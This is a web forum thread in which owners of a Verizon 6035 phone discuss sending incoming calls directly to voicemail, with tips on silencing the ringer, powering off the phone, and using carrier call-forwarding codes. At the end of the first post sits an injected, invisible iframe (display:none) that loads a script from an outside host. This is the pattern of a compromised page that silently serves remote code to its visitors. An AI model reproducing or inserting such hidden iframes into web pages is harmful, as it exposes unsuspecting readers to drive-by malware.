+ Reply to Thread
    PBXBear

Sending Calls Straight to VoiceMail??

Anyone know how to send a call straight to voicemail? Typically, with cell phones if a call comes in and you don't want to talk with them you can hit the END or CLEAR button and it will send the call straight to voicemail. When I hit the end or clear button on my Verizon 6035 the call remains on the phone (but slienced) until RONA (Redirect On No Answer) kicks in.

I must be missing something here?? <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    NAW.... u aint missing nuthin'....

just silence the ring and let it go to voicemail.. i must be in the dar ages, bu i didnt know celly's had a feature to instantly take a call to voice...

PBXBear
    Yes, every Cell Phone I've had prior all send a call straight to voice mail when you hit CLEAR or END. NextTel, AWS, Cingular, SprintPCS and ORANGE. This is the first time that I have not seen this feature. It's not very nice to keep a caller earing ringing. Oh well. It's a minor hassle, but still a hassle.

Administrator
    well i know if you dont answer the phone itr wil eventually go to voicemail (if you have voicemail). i too, have had bellsouth/cingular, and sprint and have had SEVERAL phones, and i have used the 'clear' or 'end' buttons to silence the ringer. but i didnt know that this would directly take the call to voice mail.. i just thought it only silenced the ring.

jeh
    Well let's see -- if the phone is OFF when the call is received, obviously it goes straight to v.m. (after four rings in my case) Have you thought about powering off the phone? A little drastic, I know.... but I just tried it and it works.

Perhaps a future upgrade of the phone firmware could trigger this function with a bit less work on our part.

Converged

Configuring # of rings...

Is there a way to set the # of times the ringer will chime on incomming calls? In other words, if there is an incoming call and you press the red telephone button (don't answer button), how do we get the call to go directly to voicemail rather than simply turning off the ringer?

I do Call Forwarding. That's if you want all calls to go directly to the v-mail. I'm on Verizon and this works on their system. I can't remember if Call Forwarding has a setable # of rings. I know that Call Busy/Call Forward does.

Let us know if that's not a working solution for you and we'll try something else. No, I don't know a way to set number of inbound rings, but perhaps someone that been in the bowels of KWPST could help with that one.

You have two questions...

Q1: Is there a way I can send an incoming call directly to voicemail while the phone is ringing.
    A1: No. But as you observed, hitting the red button silences the rings until your provider's service sends the call to voicemail.

Q2: Is the number of rings configurable?
    A2: Maybe. I went into my Verizon Wireless office and asked them to increase the number of rings before voicemail from 3 to 6. They did it. Check with your provider.

Verizon will reduce the # of rings if you call cust service, I think the lowest is 2 rings b4 going to VM.

The only solution I found was to turn the phone off, this will send all incoming calls to VM immediately

Converged

Send to voicemail?

Anybody get to the bottom of this? Is it possible to get a call, see the caller ID and then decide to send the call straight to voice mail?

Administrator
    no. unless you have the phone off, then they would go . :

kevinmclees
    My 2 cents is - pressing the jog will also silence the ring. Would love to find a way to send straight to VM also....

One way to accomplish this is via Call Forwarding. Call Forwarding may be an extra cost feature with your carrier, but it can't hurt to call customer service and ask about it.

With Verizon you do *72 then the phone number to transfer/forward to (in this case it would be the number for v-mail) and send. To deactivate you do *73 and send. Each of these actions give a confirmation beeping tone.

Works for this guy.

psanchez

Incoming Call -> Voicemail

This is probably a silly/simple question. Ive finally got my phone setup pretty much exactly how I want but there is 1 last feature I think it may be missing and im not sure if it can do this or not.

Basicly, with my old sprint phone, when I got an incoming call and didnt want to answer it I just click the 'hang up' button and the caller was immediately sent to my voicemail. I know with the '35 you can press the wheel on the side to silence the ringer but it still rings many times before they get my voicemail (cause all its doing is silencing the ringer lol). Is there anyway to just use the 'hangup' button to get them sent directly to voicemail?

TIA

Peter

Hmm,

Kinda neat feature, I never had it though on my old Samsung 8500, or if I did wasn't aware of it.

Not aware of it being on the 6035, not sure how usefull it would be, might be nice to expirament with to see though. Can't see too much difference between silencing the ringer and that feature. Except to save whoevers calling me a few seconds.

:rolleyes1

Maybe if I had the feature before I might see it in a different light.

Remember, When the long night comes return to the end of the beginning.

Administrator
    on sprint, its not possible. you can push the red phone button to silence the ring ASAP, but it will still take the same amount of time to roll over to VM... :

Ramjet
    I just talk to verizon about this. When my phone is off it still rings before VM picks up. This is a network "feature". It has nothing to do with the phone.

Oh When that Shark Bites! LBOCEAN's Avatar

Call Fowarding

Originally posted by hatman
    One way to accomplish this is via Call Forwarding. Call Forwarding may be an extra cost feature with your carrier, but it can't hurt to call customer service and ask about it.

With Verizon you do *72 then the phone number to transfer/forward to (in this case it would be the number for v-mail) and send. To deactivate you do *73 and send. Each of these actions give a confirmation beeping tone.

Works for this guy.
    Also, there are two types of Call Forwarding:

1 - Immediate
    2 - Passive - 2 to 4 rings then goes to VM

Newly Converged

If you have Verizon...hit *83 and calls will be sent directly to voicemail w/o the phone ringing. To shut this feature off hit *84.
    Haven't tried it myself so I'm curious to see if it works.

Converged
    Concerning my LG this works-and it will probably work on many Verizon phones:

As soon as it rings hit the side volume button to silence ringer
    Hit button a second time-call is now "missed" and goes straight to voicemail

Bob